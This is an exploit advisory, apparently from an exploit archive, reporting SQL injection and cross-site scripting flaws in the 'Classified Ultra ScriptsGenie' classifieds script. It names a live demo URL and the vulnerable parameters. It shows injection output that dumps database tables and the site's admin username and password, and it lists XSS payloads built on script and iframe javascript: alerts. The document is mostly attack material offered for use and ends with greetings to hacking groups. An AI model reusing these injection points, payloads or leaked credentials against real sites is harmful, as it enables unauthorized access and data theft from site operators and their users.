# Exploit Title; Classified Ultra ScriptsGenie Multiple Vulnerabilities
# Date; 20/1/13
# Author; 3spi0n
# Script Vendor or Software Link;
http://www.hotscripts.com/listing/classified-ultra-scriptsgenie/
# Category; Webapps
# Type; SQL Injection [MySQLi]
# Tested on; Ubuntu 12.10 / Win7 / Backtrack 5

[#] Demo Analyzing ;

# http://resalemembership.com/demos/classifiedultra/nclass.php [Official
Demo]

[#] Vulnerable Analyzing ;

[-] SQL Injection

# http://resalemembership.com/demos/classifiedultra/subclass.php?c=16'
[SQLi HERE]

[...] Analyzing

Selected Column Count is 4
Valid String Column is 3
Current DB: resalem1_ultra
...
Tables found:
Site_Admin,clientsignup,contact,o_ads,o_categories,o_catimages,o_subcategories
[Using "Site_Admin"]
...
Columns found: id,admin,passme
...
Data Found: admin=admin
Data Found: passme=pass

[-] XSS

#
http://resalemembership.com/demos/classifiedultra/subclass.php?c=6&cname=Credit%20Cards[XSS
HERE]

[...] Analyzing

# http://resalemembership.com/demos/classifiedultra/subclass.php?c=6&cname=
<script>alert('3spi0n')</script>
# http://resalemembership.com/demos/classifiedultra/subclass.php?c=6&cname=<IFRAME
SRC="javascript:alert('3spi0n');"></IFRAME>

[#] Greetz ;

- Grayhatz Inc. & Janissaries Team
- Twitter.Com/bariiiscan - Facebook.Com/3spi0ne